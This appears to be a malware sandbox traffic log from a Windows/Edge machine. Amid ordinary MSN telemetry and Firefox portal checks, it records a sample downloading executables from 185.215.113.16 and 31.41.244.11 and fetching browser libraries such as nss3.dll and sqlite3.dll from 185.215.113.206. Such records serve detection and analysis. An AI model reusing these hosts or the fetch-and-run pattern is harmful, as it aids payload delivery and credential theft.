Source: global traffic	HTTP traffic detected: GET /b?rn=1730737990748&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3405481148D06121347F5D3C49F5602E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=3405481148D06121347F5D3C49F5602E&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308\|10837393&bcnt=1\|1&asid=ef9c32801f6542abc5f3f2c1354c3716 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=3405481148D06121347F5D3C49F5602E; _EDGE_S=F=1&SID=2C258FC5B0C160DE09DB9AE8B14B619B; _EDGE_V=1
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msOZ9.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /b2?rn=1730737990748&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=3405481148D06121347F5D3C49F5602E&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=14E12d7486971b7b0dea40d1730737991; XID=14E12d7486971b7b0dea40d1730737991
Source: global traffic	HTTP traffic detected: GET /c.gif?rnd=1730737990747&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=9f416a6bd5434528bbeea86de8186ed5&activityId=9f416a6bd5434528bbeea86de8186ed5&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=4E7E11E8A35E4E5B8E9B7862C977EF98&MUID=3405481148D06121347F5D3C49F5602E HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3405481148D06121347F5D3C49F5602E; _EDGE_S=F=1&SID=2C258FC5B0C160DE09DB9AE8B14B619B; _EDGE_V=1; _C_ETH=1; SM=T
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/AA11MSkH.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSj.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=1&locale=en-us&country=US&muid=3405481148D06121347F5D3C49F5602E&bcnt=1&placement=88000244&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=6686581979505309747&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&asid=9379f8afab7548ba8ff13bf9fdcb0eea HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=3405481148D06121347F5D3C49F5602E; _EDGE_S=F=1&SID=2C258FC5B0C160DE09DB9AE8B14B619B; _EDGE_V=1; _C_ETH=1
Source: global traffic	HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /files/pisos23.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /746f34465cf17784/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic	HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
